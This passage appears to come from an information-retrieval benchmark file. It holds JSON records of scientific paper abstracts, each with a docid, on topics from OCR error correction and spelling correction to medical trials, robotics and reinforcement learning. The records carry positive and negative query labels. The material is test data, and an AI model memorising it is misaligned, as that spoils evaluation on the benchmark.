nancial support. Corresponding author. Department of Economics and Health Economics Bergen, Norwegian School of Economics and Business Administration, Helleveien 30, N-5045 Bergen, Norway. E-mail: kurt.brekke@nhh.no. Uni Rokkan Centre, Health Economics Bergen, Nygårdsgaten 5, N-5015 Bergen, Norway. E-mail: tor.holmas@uni.no. Department of Economics/NIPE, University of Minho, Campus de Gualtar, 4710-057 Braga, Portugal; and University of Bergen (Economics), Norway. E-mail: o.r.straume@eeg.uminho.pt.",
"title": ""
},
{
"docid": "b7524787cce58c3bf34a9d7fd3c8af90",
"text": "Convolutional Neural Networks and Graphics Processing Units have been at the core of a paradigm shift in computer vision research that some researchers have called “the algorithmic perception revolution.” This thesis presents the implementation and analysis of several techniques for performing artistic style transfer using a Convolutional Neural Network architecture trained for large-scale image recognition tasks. We present an implementation of an existing algorithm for artistic style transfer in images and video. The neural algorithm separates and recombines the style and content of arbitrary images. Additionally, we present an extension of the algorithm to perform weighted artistic style transfer.",
"title": ""
},
{
"docid": "f4562d3b45761d01e64f1f72bee5eec7",
"text": "We introduce two Python frameworks to train neural networks on large datasets: Blocks and Fuel. Blocks is based on Theano, a linear algebra compiler with CUDA-support (Bastien et al., 2012; Bergstra et al., 2010). It facilitates the training of complex neural network models by providing parametrized Theano operations, attaching metadata to Theano’s symbolic computational graph, and providing an extensive set of utilities to assist training the networks, e.g. training algorithms, logging, monitoring, visualization, and serialization. Fuel provides a standard format for machine learning datasets. It allows the user to easily iterate over large datasets, performing many types of pre-processing on the fly.",
"title": ""
},
{
"docid": "7f9515a848cca72fb1864c55e6e52e50",
"text": "William 111. Waite ver the past five years, our group has developed the Eli’ system to reduce the cost of producing compilers. Eli has been used to construct complete compilers for standard programming languages extensions to standard programming languages, and specialpurpose languages. For the remainder of this article, we will use the term compiler when referring to language processors. One of the most important ways to enhance productivity in software engineering is to provide more appropriate descriptions of problems and their",
"title": ""
},
{
"docid": "b6d8e6b610eff993dfa93f606623e31d",
"text": "Data journalism designates journalistic work inspired by digital data sources. A particularly popular and active area of data journalism is concerned with fact-checking. The term was born in the journalist community and referred the process of verifying and ensuring the accuracy of published media content; since 2012, however, it has increasingly focused on the analysis of politics, economy, science, and news content shared in any form, but first and foremost on the Web (social and otherwise). These trends have been noticed by computer scientists working in the industry and academia. Thus, a very lively area of digital content management research has taken up these problems and works to propose foundations (models), algorithms, and implement them through concrete tools. Our tutorial: (i) Outlines the current state of affairs in the area of digital (or computational) fact-checking in newsrooms, by journalists, NGO workers, scientists and IT companies; (ii) Shows which areas of digital content management research, in particular those relying on the Web, can be leveraged to help fact-checking, and gives a comprehensive survey of efforts in this area; (iii) Highlights ongoing trends, unsolved problems, and areas where we envision future scientific and practical advances. PVLDB Reference Format: S. Cazalens, J. Leblay, P. Lamarre, I. Manolescu, X. Tannier. Computational Fact Checking: A Content Management Perspective. PVLDB, 11 (12): 2110-2113, 2018. DOI: https://doi.org/10.14778/3229863.3229880 This work is licensed under the Creative Commons AttributionNonCommercial-NoDerivatives 4.0 International License. To view a copy of this license, visit http://creativecommons.org/licenses/by-nc-nd/4.0/. For any use beyond those covered by this license, obtain permission by emailing info@vldb.org. Proceedings of the VLDB Endowment, Vol. 11, No. 12 Copyright 2018 VLDB Endowment 2150-8097/18/8. DOI: https://doi.org/10.14778/3229863.3229880 1. OUTLINE In Section 1.1, we provide a short history of journalistic fact-checking and presents its most recent and visible actors, from the media and/or NGO communities. Section 1.2 discusses the scientific content management areas which bring useful tools for computational fact-checking. 1.1 Data journalism and fact-checking While data of some form is a natural ingredient of all reporting, the increasing volumes and complexity of digital data lead to a qualitative jump, where technical skills, and in particular data science skills, are stringently needed in journalistic work. A particularly popular and active area of data journalism is concerned with fact-checking. The term was born in the journalist community; it referred to the task of identifying and checking factual claims present in media content, which dedicated newsroom personnel would then check for factual accuracy. The goal of such checking was to avoid misinformation, to protect the journal reputation and avoid legal actions. Starting around 2012, first in the United States (FactCheck.org), then in Europe, and soon after in all areas of the world, journalists have started to take advantage of modern technologies for processing content, such as text, video, structured and unstructured data, in order to automate, at least partially, the knowledge finding, reasoning, and analysis tasks which had been previously performed completely by humans. Over time, the focus of fact-checking shifted from verifying claims made by media outlets, toward the claims made by politicians and other public figures. This trend coincided with the parallel (but distinct) evolution toward asking Government Open Data, that is: the idea that governing bodies should share with the public precise information describing their functioning, so that the people have means to assess the quality of their elected representation. Government Open Data became quickly available, in large volumes, e.g. through data.gov in the US, data.gov.uk in the UK, data.gouv.fr in France etc.; journalists turned out to be the missing link between the newly available data and comprehension by the public. Data journalism thus found http://factcheck.org",
"title": ""
},
{
"docid": "e16d89d3a6b3d38b5823fae977087156",
"text": "The payoff of abarrier option depends on whether or not a specified asset price, index, or rate reaches a specified level during the life of the option. Most models for pricing barrier options assume continuous monitoring of the barrier; under this assumption, the option can often be priced in closed form. Many (if not most) real contracts with barrier provisions specify discrete monitoring instants; there are essentially no formulas for pricing these options, and even numerical pricing is difficult. We show, however, that discrete barrier options can be priced with remarkable accuracy using continuous barrier formulas by applying a simple continuity correction to the barrier. The correction shifts the barrier away from the underlying by a factor of exp (βσ √ 1t), whereβ ≈ 0.5826,σ is the underlying volatility, and1t is the time between monitoring instants. The correction is justified both theoretically and experimentally.",
"title": ""
},
{
"docid": "691f992fe99d6e16a97f694375014d16",
"text": "Database fragmentation allows reducing irrelevant data accesses by grouping data frequently accessed together in dedicated segments. In this paper, we address multimedia database fragmentation to take into account the rich characteristics of multimedia objects. We particularly discuss multimedia primary horizontal fragmentation and focus on semantic-based textual predicates implication required as a pre-process in current fragmentation algorithms in order to partition multimedia data efficiently. Identifying semantic implication between similar queries (if a user searches for the images containing a car, he would probably mean auto, vehicle, van or sport-car as well) will improve the fragmentation process. Making use of the neighborhood concept in knowledge bases to identify semantic implications constitutes the core of our proposal. A prototype has been implemented to evaluate the performance of our approach.",
"title": ""
},
{
"docid": "08cf1e6353fa3c9969188d946874c305",
"text": "In this paper we develop, analyze, and test a new algorithm for the global minimization of a function subject to simple bounds without the use of derivatives. The underlying algorithm is a pattern search method, more specifically a coordinate search method, which guarantees convergence to stationary points from arbitrary starting points. In the optional search phase of pattern search we apply a particle swarm scheme to globally explore the possible nonconvexity of the objective function. Our extensive numerical experiments showed that the resulting algorithm is highly competitive with other global optimization methods also based on function values.",
"title": ""
},
{
"docid": "ae4b651ea8bd6b4c7c6efcc52f76516e",
"text": "We study a regularization framework where we feed an original clean data point and a nearby point through a mapping, which is then penalized by the Euclidian distance between the corresponding outputs. The nearby point may be chosen randomly or adversarially. A more general form of this framework has been presented in (Bachman et al., 2014). We relate this framework to many existing regularization methods: It is a stochastic estimate of penalizing the Frobenius norm of the Jacobian of the mapping as in Poggio & Girosi (1990), it generalizes noise regularization (Sietsma & Dow, 1991), and it is a simplification of the canonical regularization term by the ladder networks in Rasmus et al. (2015). We also investigate the connection to virtual adversarial training (VAT) (Miyato et al., 2016) and show how VAT can be interpreted as penalizing the largest eigenvalue of a Fisher information matrix. Our contribution is discovering connections between the studied and other existing regularization methods.",
"title": ""
},
{
"docid": "eef1e51e4127ed481254f97963496f48",
"text": "-Vehicular ad hoc networks (VANETs) are wireless networks that do not require any fixed infrastructure. Regarding traffic safety applications for VANETs, warning messages have to be quickly and smartly disseminated in order to reduce the required dissemination time and to increase the number of vehicles receiving the traffic warning information. Adaptive techniques for VANETs usually consider features related to the vehicles in the scenario, such as their density, speed, and position, to adapt the performance of the dissemination process. These approaches are not useful when trying to warn the highest number of vehicles about dangerous situations in realistic vehicular environments. The Profile-driven Adaptive Warning Dissemination Scheme (PAWDS) designed to improve the warning message dissemination process. PAWDS system that dynamically modifies some of the key parameters of the propagation process and it cannot detect the vehicles which are in the dangerous position. Proposed system identifies the vehicles which are in the dangerous position and to send warning messages immediately. The vehicles must make use of all the available information efficiently to predict the position of nearby vehicles. Keywords— PAWDS, VANET, Ad hoc network , OBU , RSU, GPS.",
"title": ""
}
] | scidocsrr |
d886efe936a8e226d501740d9937ad58 | Low-resource OCR error detection and correction in French Clinical Texts | [
{
"docid": "5510f5e1bcf352e3219097143200531f",
"text": "Research aimed at correcting words in text has focused on three progressively more difficult problems:(1) nonword error detection; (2) isolated-word error correction; and (3) context-dependent work correction. In response to the first problem, efficient pattern-matching and n-gram analysis techniques have been developed for detecting strings that do not appear in a given word list. In response to the second problem, a variety of general and application-specific spelling correction techniques have been developed. Some of them were based on detailed studies of spelling error patterns. In response to the third problem, a few experiments using natural-language-processing tools or statistical-language models have been carried out. This article surveys documented findings on spelling error patterns, provides descriptions of various nonword detection and isolated-word error correction techniques, reviews the state of the art of context-dependent word correction techniques, and discusses research issues related to all three areas of automatic error correction in text.",
"title": ""
}
] | [
{
"docid": "b911c86e5672f9a669e25c7771076d24",
"text": "This paper discusses an implementation of Extended Kalman filter (EKF) in performing Simultaneous Localization and Mapping (SLAM). The implementation is divided into software and hardware phases. The software implementation applies EKF using Python on a library dataset to produce a map of the supposed environment. The result was verified against the original map and found to be relatively accurate with minor inaccuracies. In the hardware implementation stage, real life data was gathered from an indoor environment via a laser range finder and a pair of wheel encoders placed on a mobile robot. The resulting map shows at least five marked inaccuracies but the overall form is passable.",
"title": ""
},
{
"docid": "e027e472740cea38ef29a347442b14d9",
"text": "De-noising and segmentation are fundamental steps in processing of images. They can be used as preprocessing and post-processing step. They are used to enhance the image quality. Various medical imaging that are used in these days are Magnetic Resonance Images (MRI), Ultrasound, X-Ray, CT Scan etc. Various types of noises affect the quality of images which may lead to unpredictable results. Various noises like speckle noise, Gaussian noise and Rician noise is present in ultrasound, MRI respectively. With the segmentation region required for analysis and diagnosis purpose is extracted. Various algorithm for segmentation like watershed, K-mean clustering, FCM, thresholding, region growing etc. exist. In this paper, we propose an improved watershed segmentation using denoising filter. First of all, image will be de-noised with morphological opening-closing technique then watershed transform using linear correlation and convolution operations is applied to improve efficiency, accuracy and complexity of the algorithm. In this paper, watershed segmentation and various techniques which are used to improve the performance of watershed segmentation are discussed and comparative analysis is done.",
"title": ""
},
{
"docid": "1da747ae58d80c218811618be4538a7b",
"text": "Smartphones and other trendy mobile wearable devices are rapidly becoming the dominant sensing, computing and communication devices in peoples' daily lives. Mobile crowd sensing is an emerging technology based on the sensing and networking capabilities of such mobile wearable devices. MCS has shown great potential in improving peoples' quality of life, including healthcare and transportation, and thus has found a wide range of novel applications. However, user privacy and data trustworthiness are two critical challenges faced by MCS. In this article, we introduce the architecture of MCS and discuss its unique characteristics and advantages over traditional wireless sensor networks, which result in inapplicability of most existing WSN security solutions. Furthermore, we summarize recent advances in these areas and suggest some future research directions.",
"title": ""
},
{
"docid": "ed9528fe8e4673c30de35d33130c728e",
"text": "This paper introduces a friendly system to control the home appliances remotely by the use of mobile cell phones; this system is well known as “Home Automation System” (HAS).",
"title": ""
},
{
"docid": "74bac9b30cb29eb67df0bdc71f3c4583",
"text": "BACKGROUND\nMedical practitioners use survival models to explore and understand the relationships between patients' covariates (e.g. clinical and genetic features) and the effectiveness of various treatment options. Standard survival models like the linear Cox proportional hazards model require extensive feature engineering or prior medical knowledge to model treatment interaction at an individual level. While nonlinear survival methods, such as neural networks and survival forests, can inherently model these high-level interaction terms, they have yet to be shown as effective treatment recommender systems.\n\n\nMETHODS\nWe introduce DeepSurv, a Cox proportional hazards deep neural network and state-of-the-art survival method for modeling interactions between a patient's covariates and treatment effectiveness in order to provide personalized treatment recommendations.\n\n\nRESULTS\nWe perform a number of experiments training DeepSurv on simulated and real survival data. We demonstrate that DeepSurv performs as well as or better than other state-of-the-art survival models and validate that DeepSurv successfully models increasingly complex relationships between a patient's covariates and their risk of failure. We then show how DeepSurv models the relationship between a patient's features and effectiveness of different treatment options to show how DeepSurv can be used to provide individual treatment recommendations. Finally, we train DeepSurv on real clinical studies to demonstrate how it's personalized treatment recommendations would increase the survival time of a set of patients.\n\n\nCONCLUSIONS\nThe predictive and modeling capabilities of DeepSurv will enable medical researchers to use deep neural networks as a tool in their exploration, understanding, and prediction of the effects of a patient's characteristics on their risk of failure.",
"title": ""
},
{
"docid": "da540860f3ecb9ca15148a7315b74a45",
"text": "Learning mathematics is one of the most important aspects that determine the future of learners. However, mathematics as one of the subjects is often perceived as being complicated and not liked by the learners. Therefore, we need an application with the use of appropriate technology to create visualization effects which can attract more attention from learners. The application of Augmented Reality technology in digital game is a series of efforts made to create a better visualization effect. In addition, the system is also connected to a leaderboard web service in order to improve the learning motivation through competitive process. Implementation of Augmented Reality is proven to improve student's learning motivation moreover implementation of Augmented Reality in this game is highly preferred by students.",
"title": ""
},
{
"docid": "46ab119ffd9850fe1e5ff35b6cda267d",
"text": "Wireless sensor networks are expected to find wide applicability and increasing deployment in the near future. In this paper, we propose a formal classification of sensor networks, based on their mode of functioning, as proactive and reactive networks. Reactive networks, as opposed to passive data collecting proactive networks, respond immediately to changes in the relevant parameters of interest. We also introduce a new energy efficient protocol, TEEN (Threshold sensitive Energy Efficient sensor Network protocol) for reactive networks. We evaluate the performance of our protocol for a simple temperature sensing application. In terms of energy efficiency, our protocol has been observed to outperform existing conventional sensor network protocols.",
"title": ""
},
{
"docid": "0ba036ae72811c02179842f1949974b6",
"text": "The authors propose a new climatic drought index: the standardized precipitation evapotranspiration index (SPEI). The SPEI is based on precipitation and temperature data, and it has the advantage of combining multiscalar character with the capacity to include the effects of temperature variability on drought assessment. The procedure to calculate the index is detailed and involves a climatic water balance, the accumulation of deficit/surplus at different time scales, and adjustment to a log-logistic probability distribution. Mathematically, the SPEI is similar to the standardized precipitation index (SPI), but it includes the role of temperature. Because the SPEI is based on a water balance, it can be compared to the self-calibrated Palmer drought severity index (sc-PDSI). Time series of the three indices were compared for a set of observatories with different climate characteristics, located in different parts of the world. Under global warming conditions, only the sc-PDSI and SPEI identified an increase in drought severity associated with higher water demand as a result of evapotranspiration. Relative to the sc-PDSI, the SPEI has the advantage of being multiscalar, which is crucial for drought analysis and monitoring.",
"title": ""
},
{
"docid": "5a8916d6019cf10784b2258299eb6ceb",
"text": "In recent years, there is global demand for Islamic knowledge by both Muslims and non-Muslims. This has brought about number of automated applications that ease the retrieval of knowledge from the holy books. However current retrieval methods lack semantic information they are mostly base on keywords matching approach. In this paper we have proposed a Model that will make use of semantic Web technologies (ontology) to model Quran domain knowledge. The system will enhance Quran knowledge by enabling queries in natural language.",
"title": ""
},
{
"docid": "e6d05a96665c2651c0b31f1bff67f04d",
"text": "Detecting the neural processes like axons and dendrites needs high quality SEM images. This paper proposes an approach using perceptual grouping via a graph cut and its combinations with Convolutional Neural Network (CNN) to achieve improved segmentation of SEM images. Experimental results demonstrate improved computational efficiency with linear running time.",
"title": ""
},
{
"docid": "4136eb42db90f60196cf828231039707",
"text": "Most of the existing model verification and validation techniques are largely used in the industrial and system engineering fields. The agent-based modeling approach is different from traditional equation-based modeling approach in many aspects. As the agent-based modeling approach has recently become an attractive and efficient way for modeling large-scale complex systems, there are few formalized validation methodologies existing for model validation. In our proposed work, we design, develop, adapt, and apply various verification and validation techniques to an agent-based scientific model and investigate the sufficiency of these techniques for the validation of agent-based mod-",
"title": ""
},
{
"docid": "3afa9f84c76bdca939c0a3dc645b4cbf",
"text": "Recurrent neural networks are theoretically capable of learning complex temporal sequences, but training them through gradient-descent is too slow and unstable for practical use in reinforcement learning environments. Neuroevolution, the evolution of artificial neural networks using genetic algorithms, can potentially solve real-world reinforcement learning tasks that require deep use of memory, i.e. memory spanning hundreds or thousands of inputs, by searching the space of recurrent neural networks directly. In this paper, we introduce a new neuroevolution algorithm called Hierarchical Enforced SubPopulations that simultaneously evolves networks at two levels of granularity: full networks and network components or neurons. We demonstrate the method in two POMDP tasks that involve temporal dependencies of up to thousands of time-steps, and show that it is faster and simpler than the current best conventional reinforcement learning system on these tasks.",
"title": ""
},
{
"docid": "f70447a47fb31fc94d6b57ca3ef57ad3",
"text": "BACKGROUND\nOn Aug 14, 2014, the US Food and Drug Administration approved the antiangiogenesis drug bevacizumab for women with advanced cervical cancer on the basis of improved overall survival (OS) after the second interim analysis (in 2012) of 271 deaths in the Gynecologic Oncology Group (GOG) 240 trial. In this study, we report the prespecified final analysis of the primary objectives, OS and adverse events.\n\n\nMETHODS\nIn this randomised, controlled, open-label, phase 3 trial, we recruited patients with metastatic, persistent, or recurrent cervical carcinoma from 81 centres in the USA, Canada, and Spain. Inclusion criteria included a GOG performance status score of 0 or 1; adequate renal, hepatic, and bone marrow function; adequately anticoagulated thromboembolism; a urine protein to creatinine ratio of less than 1; and measurable disease. Patients who had received chemotherapy for recurrence and those with non-healing wounds or active bleeding conditions were ineligible. We randomly allocated patients 1:1:1:1 (blocking used; block size of four) to intravenous chemotherapy of either cisplatin (50 mg/m2 on day 1 or 2) plus paclitaxel (135 mg/m2 or 175 mg/m2 on day 1) or topotecan (0·75 mg/m2 on days 1-3) plus paclitaxel (175 mg/m2 on day 1) with or without intravenous bevacizumab (15 mg/kg on day 1) in 21 day cycles until disease progression, unacceptable toxic effects, voluntary withdrawal by the patient, or complete response. We stratified randomisation by GOG performance status (0 vs 1), previous radiosensitising platinum-based chemotherapy, and disease status (recurrent or persistent vs metastatic). We gave treatment open label. Primary outcomes were OS (analysed in the intention-to-treat population) and adverse events (analysed in all patients who received treatment and submitted adverse event information), assessed at the second interim and final analysis by the masked Data and Safety Monitoring Board. The cutoff for final analysis was 450 patients with 346 deaths. This trial is registered with ClinicalTrials.gov, number NCT00803062.\n\n\nFINDINGS\nBetween April 6, 2009, and Jan 3, 2012, we enrolled 452 patients (225 [50%] in the two chemotherapy-alone groups and 227 [50%] in the two chemotherapy plus bevacizumab groups). By March 7, 2014, 348 deaths had occurred, meeting the prespecified cutoff for final analysis. The chemotherapy plus bevacizumab groups continued to show significant improvement in OS compared with the chemotherapy-alone groups: 16·8 months in the chemotherapy plus bevacizumab groups versus 13·3 months in the chemotherapy-alone groups (hazard ratio 0·77 [95% CI 0·62-0·95]; p=0·007). Final OS among patients not receiving previous pelvic radiotherapy was 24·5 months versus 16·8 months (0·64 [0·37-1·10]; p=0·11). Postprogression OS was not significantly different between the chemotherapy plus bevacizumab groups (8·4 months) and chemotherapy-alone groups (7·1 months; 0·83 [0·66-1·05]; p=0·06). Fistula (any grade) occurred in 32 (15%) of 220 patients in the chemotherapy plus bevacizumab groups (all previously irradiated) versus three (1%) of 220 in the chemotherapy-alone groups (all previously irradiated). Grade 3 fistula developed in 13 (6%) versus one (<1%). No fistulas resulted in surgical emergencies, sepsis, or death.\n\n\nINTERPRETATION\nThe benefit conferred by incorporation of bevacizumab is sustained with extended follow-up as evidenced by the overall survival curves remaining separated. After progression while receiving bevacizumab, we did not observe a negative rebound effect (ie, shorter survival after bevacizumab is stopped than after chemotherapy alone is stopped). These findings represent proof-of-concept of the efficacy and tolerability of antiangiogenesis therapy in advanced cervical cancer.\n\n\nFUNDING\nNational Cancer Institute.",
"title": ""
},
{
"docid": "80d859e26c815e5c6a8c108ab0141462",
"text": "StarCraft II poses a grand challenge for reinforcement learning. The main difficulties include huge state space, varying action space, long horizon, etc. In this paper, we investigate a set of techniques of reinforcement learning for the full-length game of StarCraft II. We investigate a hierarchical approach, where the hierarchy involves two levels of abstraction. One is the macro-actions extracted from expert’s demonstration trajectories, which can reduce the action space in an order of magnitude yet remains effective. The other is a two-layer hierarchical architecture, which is modular and easy to scale. We also investigate a curriculum transfer learning approach that trains the agent from the simplest opponent to harder ones. On a 64×64 map and using restrictive units, we train the agent on a single machine with 4 GPUs and 48 CPU threads. We achieve a winning rate of more than 99% against the difficulty level-1 built-in AI. Through the curriculum transfer learning algorithm and a mixture of combat model, we can achieve over 93% winning rate against the most difficult non-cheating built-in AI (level-7) within days. We hope this study could shed some light on the future research of large-scale reinforcement learning.",
"title": ""
},
{
"docid": "d2304dae0f99bf5e5b46d4ceb12c0d69",
"text": "The ultimate goal of this indoor mapping research is to automatically reconstruct a floorplan simply by walking through a house with a smartphone in a pocket. This paper tackles this problem by proposing FloorNet, a novel deep neural architecture. The challenge lies in the processing of RGBD streams spanning a large 3D space. FloorNet effectively processes the data through three neural network branches: 1) PointNet with 3D points, exploiting the 3D information; 2) CNN with a 2D point density image in a top-down view, enhancing the local spatial reasoning; and 3) CNN with RGB images, utilizing the full image information. FloorNet exchanges intermediate features across the branches to exploit the best of all the architectures. We have created a benchmark for floorplan reconstruction by acquiring RGBD video streams for 155 residential houses or apartments with Google Tango phones and annotating complete floorplan information. Our qualitative and quantitative evaluations demonstrate that the fusion of three branches effectively improves the reconstruction quality. We hope that the paper together with the benchmark will be an important step towards solving a challenging vector-graphics reconstruction problem. Code and data are available at https://github.com/art-programmer/FloorNet.",
"title": ""
},
{
"docid": "b64945127e8e8e23d3a5013d3aa7788a",
"text": "The process of extraction of interesting patterns or knowledge from the bulk of data refers to the data mining technique. “It is the process of discovering meaningful, new correlation patterns and trends through non-trivial extraction of implicit, previously unknown information from large amount of data stored in repositories using pattern recognition as well as statistical and mathematical techniques”. Due to the wide deployment of Internet and information technology, storage and processing of data technologies, the ever-growing privacy concern has been a major issue in data mining for information sharing. This gave rise to a new path in research, known as Privacy Preserving Data Mining (PPDM). The literature paper discusses various privacy preserving data mining algorithms and provide a wide analyses for the representative techniques for privacy preserving data mining along with their merits and demerits. The paper describes an overview of some of the well-known PPDM algorithms. Most of the algorithms are usually a modification of a well-known data-mining algorithm along with some privacy preserving techniques. This paper also focuses on the problems and directions for the future research here. The paper finally discusses the comparative analysis of some well-known privacy preservation techniques that are used. This paper is intended to be a summary and an overview of PPDM.",
"title": ""
},
{
"docid": "3a3a2261e1063770a9ccbd0d594aa561",
"text": "This paper describes an advanced care and alert portable telemedical monitor (AMON), a wearable medical monitoring and alert system targeting high-risk cardiac/respiratory patients. The system includes continuous collection and evaluation of multiple vital signs, intelligent multiparameter medical emergency detection, and a cellular connection to a medical center. By integrating the whole system in an unobtrusive, wrist-worn enclosure and applying aggressive low-power design techniques, continuous long-term monitoring can be performed without interfering with the patients' everyday activities and without restricting their mobility. In the first two and a half years of this EU IST sponsored project, the AMON consortium has designed, implemented, and tested the described wrist-worn device, a communication link, and a comprehensive medical center software package. The performance of the system has been validated by a medical study with a set of 33 subjects. The paper describes the main concepts behind the AMON system and presents details of the individual subsystems and solutions as well as the results of the medical validation.",
"title": ""
},
{
"docid": "48d7946228c33ba82f3870e0e08acf0d",
"text": "Trajectory prediction of objects in moving objects databases (MODs) has garnered wide support in a variety of applications and is gradually becoming an active research area. The existing trajectory prediction algorithms focus on discovering frequent moving patterns or simulating the mobility of objects via mathematical models. While these models are useful in certain applications, they fall short in describing the position and behavior of moving objects in a network-constraint environment. Aiming to solve this problem, a hidden Markov model (HMM)-based trajectory prediction algorithm is proposed, called Hidden Markov model-based Trajectory Prediction (HMTP). By analyzing the disadvantages of HMTP, a self-adaptive parameter selection algorithm called HMTP * is proposed, which captures the parameters necessary for real-world scenarios in terms of objects with dynamically changing speed. In addition, a density-based trajectory partition algorithm is introduced, which helps improve the efficiency of prediction. In order to evaluate the effectiveness and efficiency of the proposed algorithms, extensive experiments were conducted, and the experimental results demonstrate that the effect of critical parameters on the prediction accuracy in the proposed paradigm, with regard to HMTP *, can greatly improve the accuracy when compared with HMTP, when subjected to randomly changing speeds. Moreover, it has higher positioning precision than HMTP due to its capability of self-adjustment.",
"title": ""
},
{
"docid": "322d23354a9bf45146e4cb7c733bf2ec",
"text": "In this chapter we consider the problem of automatic facial expression analysis. Our take on this is that the field has reached a point where it needs to move away from considering experiments and applications under in-the-lab conditions, and move towards so-called in-the-wild scenarios. We assume throughout this chapter that the aim is to develop technology that can be deployed in practical applications under unconstrained conditions. While some first efforts in this direction have been reported very recently, it is still unclear what the right path to achieving accurate, informative, robust, and real-time facial expression analysis will be. To illuminate the journey ahead, we first provide in Sec. 1 an overview of the existing theories and specific problem formulations considered within the computer vision community. Then we describe in Sec. 2 the standard algorithmic pipeline which is common to most facial expression analysis algorithms. We include suggestions as to which of the current algorithms and approaches are most suited to the scenario considered. In section 3 we describe our view of the remaining challenges, and the current opportunities within the field. This chapter is thus not intended as a review of different approaches, but rather a selection of what we believe are the most suitable state-of-the-art algorithms, and a selection of exemplars chosen to characterise a specific approach. We review in section 4 some of the exciting opportunities for the application of automatic facial expression analysis to everyday practical problems and current commercial applications being exploited. Section 5 ends the chapter by summarising the major conclusions drawn. Brais Martinez School of Computer Science, Jubilee Campus, Wollaton Road, Nottingham, NG8 1BB e-mail: brais.martinez@nottingham.ac.uk Michel F. Valstar School of Computer Science, Jubilee Campus, Wollaton Road, Nottingham, NG8 1BB e-mail: michel.valstar@nottingham.ac.uk",
"title": ""
},
{
"docid": "1548b993c52505372128332be1b2ddf6",
"text": "This paper presents generalizations of Bayes likelihood-ratio updating rule which facilitate an asynchronous propagation of the impacts of new beliefs and/or new evidence in hierarchically organized inference structures with multi-hypotheses variables. The computational scheme proposed specifies a set of belief parameters, communication messages and updating rules which guarantee that the diffusion of updated beliefs is accomplished in a single pass and complies with the tenets of Bayes calculus.",
"title": ""
}
] | scidocsrr |
ee3cda8a3943497b63779f7f0b034599 | Resolver-to-Digital Converter for Compensation of Amplitude Imbalances using DQ Transformation | [
{
"docid": "94cb308e7b39071db4eda05c5ff16d95",
"text": "A resolver generates a pair of signals proportional to the sine and cosine of the angular position of its shaft. A new low-cost method for converting the amplitudes of these sine/cosine transducer signals into a measure of the input angle without using lookup tables is proposed. The new method takes advantage of the components used to operate the resolver, the excitation (carrier) signal in particular. This is a feedforward method based on comparing the amplitudes of the resolver signals to those of the excitation signal together with another shifted by pi/2. A simple method is then used to estimate the shaft angle through this comparison technique. The poor precision of comparison of the signals around their highly nonlinear peak regions is avoided by using a simple technique that relies only on the alternating pseudolinear segments of the signals. This results in a better overall accuracy of the converter. Beside simplicity of implementation, the proposed scheme offers the advantage of robustness to amplitude fluctuation of the transducer excitation signal.",
"title": ""
},
{
"docid": "c7453c6707e3e5b987531ca0114cfc92",
"text": "The aim of this paper is to present a fully integrated solution for synchronous motor control. The implemented controller is based on Actel Fusion field-programmable gate array (FPGA). The objective of this paper is to evaluate the ability of the proposed fully integrated solution to ensure all the required performances in such applications, particularly in terms of control quality and time/area performances. To this purpose, a current control algorithm of a permanent-magnet synchronous machine has been implemented. This machine is associated with a resolver position sensor. In addition to the current control closed loop, all the necessary motor control tasks are implemented in the same device. The analog-to-digital conversion is ensured by the integrated analog-to-digital converter (ADC), avoiding the use of external converters. The resolver processing unit, which computes the rotor position and speed from the resolver signals, is implemented in the FPGA matrix, avoiding the use of external resolver-to-digital converter (RDC). The sine patterns used for the Park transformation are stored in the integrated flash memory blocks.",
"title": ""
}
] | [
{
"docid": "1f2a8022dc883e33510f5808f7b08972",
"text": "As the need of high quality random number generators is constantly increasing especially for cryptographic algorithms, the development of high throughput randomness generators has to be combined with the development of high performance statistical test suites. Unfortunately the implementations of the most popular batteries of test suites are not focused on efficiency and high performance, do not benefit of the processing power offered by today's multi-core processors and tend to become bottlenecks in the processing of large volumes of data generated by various random number generators. Hence there is a stringent need for providing highly efficient statistical tests and our research efforts and results on improving and parallelizing the TestU01 test suite intend to fill this need. Experimental results show that the parallel version of TestU01 takes full advantage of the system's available processing power, reducing the execution time up to 4 times on the tested multicore systems.",
"title": ""
},
{
"docid": "581ec70f1a056cb344825e66ad203c69",
"text": "A new approach to achieve coalescence and sintering of metallic nanoparticles at room temperature is presented. It was discovered that silver nanoparticles behave as soft particles when they come into contact with oppositely charged polyelectrolytes and undergo a spontaneous coalescence process, even without heating. Utilizing this finding in printing conductive patterns, which are composed of silver nanoparticles, enables achieving high conductivities even at room temperature. Due to the sintering of nanoparticles at room temperature, the formation of conductive patterns on plastic substrates and even on paper is made possible. The resulting high conductivity, 20% of that for bulk silver, enabled fabrication of various devices as demonstrated by inkjet printing of a plastic electroluminescent device.",
"title": ""
},
{
"docid": "1b22c3d5bb44340fcb66a1b44b391d71",
"text": "The contrast in real world scenes is often beyond what consumer cameras can capture. For these situations, High Dynamic Range (HDR) images can be generated by taking multiple exposures of the same scene. When fusing information from different images, however, the slightest change in the scene can generate artifacts which dramatically limit the potential of this solution. We present a technique capable of dealing with a large amount of movement in the scene: we find, in all the available exposures, patches consistent with a reference image previously selected from the stack. We generate the HDR image by averaging the radiance estimates of all such regions and we compensate for camera calibration errors by removing potential seams. We show that our method works even in cases when many moving objects cover large regions of the scene.",
"title": ""
},
{
"docid": "028070222acb092767aadfdd6824d0df",
"text": "The autism spectrum disorders (ASDs) are a group of conditions characterized by impairments in reciprocal social interaction and communication, and the presence of restricted and repetitive behaviours. Individuals with an ASD vary greatly in cognitive development, which can range from above average to intellectual disability. Although ASDs are known to be highly heritable (∼90%), the underlying genetic determinants are still largely unknown. Here we analysed the genome-wide characteristics of rare (<1% frequency) copy number variation in ASD using dense genotyping arrays. When comparing 996 ASD individuals of European ancestry to 1,287 matched controls, cases were found to carry a higher global burden of rare, genic copy number variants (CNVs) (1.19 fold, P = 0.012), especially so for loci previously implicated in either ASD and/or intellectual disability (1.69 fold, P = 3.4 × 10-4). Among the CNVs there were numerous de novo and inherited events, sometimes in combination in a given family, implicating many novel ASD genes such as SHANK2, SYNGAP1, DLGAP2 and the X-linked DDX53–PTCHD1 locus. We also discovered an enrichment of CNVs disrupting functional gene sets involved in cellular proliferation, projection and motility, and GTPase/Ras signalling. Our results reveal many new genetic and functional targets in ASD that may lead to final connected pathways.",
"title": ""
},
{
"docid": "9c3050cca4deeb2d94ae5cff883a2d68",
